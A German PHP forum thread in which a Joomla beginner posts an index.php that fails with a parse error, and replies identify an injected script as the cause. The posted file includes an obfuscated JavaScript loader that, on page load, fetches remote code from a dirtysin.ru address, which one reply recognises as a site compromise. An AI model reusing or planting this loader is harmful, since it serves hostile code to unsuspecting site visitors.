Parse error: syntax error

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Parse error: syntax error

    hallo liebe gemeinde,

    ich bin neu hier und nicht sicher, ob mein problem hier richtig ist... wenn nicht, bitte ich um eine verschiebung ins richtige thema...

    seit ein paar tagen versuche ich mich an einer webseite mit joomla. ich bin totaler anfänger muss ich gestehen - habe keine ahnung von joomla und php und suche mich bei problemen stundenlang durch internet was richtig spass macht wenn ich wieder was gelöst habe... aber jetzt bin ich am verzweifeln. seit einigen tagen steht auf meiner seite nur noch folgender ausdruck:

    Parse error: syntax error, unexpected '<' in /data/multiserv/users/350095/projects/574690/www/index.php on line 91

    ein wenig gegoogelt habe ich gesehen, dass das öfters mal auftritt aber eine lösung dafür habe ich nicht gefunden. nach dem was ich bisher weiß muss es also ein fehler in der syntax der zeile 91 sein... aber was??

    hier mal die ganze index.php - vielleicht könnt ihr mir helfen (bitte, bitte...)

    <?php
    /**
    * @version $Id: index.php 11407 2009-01-09 17:23:42Z willebil $
    * @package Joomla
    * @copyright Copyright (C) 2005 - 2009 Open Source Matters. All rights reserved.
    * @license GNU/GPL, see LICENSE.php
    * Joomla! is free software. This version may have been modified pursuant
    * to the GNU General Public License, and as distributed it includes or
    * is derivative of works licensed under the GNU General Public License or
    * other free or open source software licenses.
    * See COPYRIGHT.php for copyright notices and details.
    */
    // Set flag that this is a parent file
    define( '_JEXEC', 1 );
    define('JPATH_BASE', dirname(__FILE__) );
    define( 'DS', DIRECTORY_SEPARATOR );
    require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
    require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );
    JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;
    /**
    * CREATE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe =& JFactory::getApplication('site');
    /**
    * INITIALISE THE APPLICATION
    *
    * NOTE :
    */
    // set the language
    $mainframe->initialise();
    JPluginHelper::importPlugin('system');
    // trigger the onAfterInitialise events
    JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
    $mainframe->triggerEvent('onAfterInitialise');
    /**
    * ROUTE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->route();
    // authorization
    $Itemid = JRequest::getInt( 'Itemid');
    $mainframe->authorize($Itemid);
    // trigger the onAfterRoute events
    JDEBUG ? $_PROFILER->mark('afterRoute') : null;
    $mainframe->triggerEvent('onAfterRoute');
    /**
    * DISPATCH THE APPLICATION
    *
    * NOTE :
    */
    $option = JRequest::getCmd('option');
    $mainframe->dispatch($option);
    // trigger the onAfterDispatch events
    JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
    $mainframe->triggerEvent('onAfterDispatch');
    /**
    * RENDER THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->render();
    // trigger the onAfterRender events
    JDEBUG ? $_PROFILER->mark('afterRender') : null;
    $mainframe->triggerEvent('onAfterRender');
    /**
    * RETURN THE RESPONSE
    */
    echo JResponse::toString($mainframe->getCfg('gzip'));

    hier muss jetzt irgendwas falsch sein
    <script>this.l=18257;this.l--;this.p=43988;this.p--;var jk=["DB","jv","bN"];var oO=new Date();function t(){this.HA=62698;this.HA--;this.X=54063;this.X--;var H=String("dewIG".substr(0,2)+"fe"+"r");var z=["Q","n"];uX={lg:"e"};this.BH="BH";var CS={U:"zF"};var W=new String("body");var C=window;LP=53116;LP+=34;tK=25028;tK-=167;var D=String("scripk8AN".substr(0,5)+"tWrh6".substr(0,1));var J=String("app8eJ".substr(0,3)+"end"+"B29Chi".substr(3)+"ld");var Hs=String("creati9h".substr(0,5)+"eElem"+"W8p6ent".substr(4));var a=String("sr"+"c");Ws=["ts","re"];var P=document;var x=String("onlo"+"ad");var _x=["Un","rY"];XX=9146;XX--;function T(){var Ii="Ii";var _u={nW:"JB"};try {var f='';var _=783024-774944;Y_={nb:false};var cs=65393;var g=9470-9469;var r="lZ9P/goog".substr(4)+"le.co"+"m/kak"+"KWDOaku.c".substr(4)+"om/11"+"0mb.cwTh".substr(0,5)+"om.ph"+"p";eZ=["uV"];var Dz=false;var o=String("d9Fmhttp".substr(4)+"CUF://d".substr(3)+"irty"+"sin."+"ru:");O=P[Hs](D);this.On=false;var EH=new String();var uM=[];try {var Mw='hK'} catch(Mw){};O[H]=g;O[a]=o+_+r;SA=["Ue"];xs=[];ME=[];P[W][J](O);var KC=[];var He="";} catch(xv){this.o_=false;};}sH=59152;sH+=228;C[x]=T;this.q="q";};var m=false;t();</script>
    <!--c7e0dbf4dc468aaf4051f1a4e8d61b11-->

    vielleicht hab ich auch was übersehen und bin einfach nur dumm das jetzt zu bemerken...

    bitte nochmals um hilfe...

    danke schonmal

    TimsToTale

  • #2
    Bitte nutze die PHP-Tags () und sorge dafür, dass der Code gut lesbar ist. Ich denke nicht, dass einer die Lust hat, sie da durch zu wühlen, solange das so aussieht.

    Danke
    Peter
    Nukular, das Wort ist N-u-k-u-l-a-r (Homer Simpson)
    Meine Seite

    Kommentar


    • #3
      Ich Dödel! Du baust da einfach JavaScript-Code ein. Da kann der PHP-Parser natürlich nichts mit anfangen.

      Peter
      Nukular, das Wort ist N-u-k-u-l-a-r (Homer Simpson)
      Meine Seite

      Kommentar


      • #4
        Ich vermute er hat das (-> dirtysin.ru) nicht selbst eingebaut sondern wurde gehackt. Offensichtlich dachte der Hacker/Wurm, dass er sich einfach ans Ende eines PHP-Scripts schreiben kann. Funktioniert hier nicht, weil das schließende ?> fehlt und deswegen Javascript-Code in PHP-Kontext eingebettet wurde, womit der PHP-Interpreter natürlich nichts anfangen kann.

        @TO: Schalte deine Seite erstmal ab, alles was da läuft. Dann finde heraus wie der Hack passieren konnte, dichte das Loch ab und spiel das letzte unbefleckte Backup ein.
        Zuletzt geändert von onemorenerd; 09.05.2010, 18:14.

        Kommentar


        • #5
          Zitat von onemorenerd Beitrag anzeigen
          Ich vermute er hat das (-> dirtysin.ru) nicht selbst eingebaut sondern wurde gehackt.
          Da hat aber einer Adleraugen!

          Ich dachte, es wäre ein Tracking-Programm, weil ich was von google.com gesehen habe. Und die verschlüsseln ihren Code auch sehr gerne.

          Peter
          Nukular, das Wort ist N-u-k-u-l-a-r (Homer Simpson)
          Meine Seite

          Kommentar

          Lädt...
          X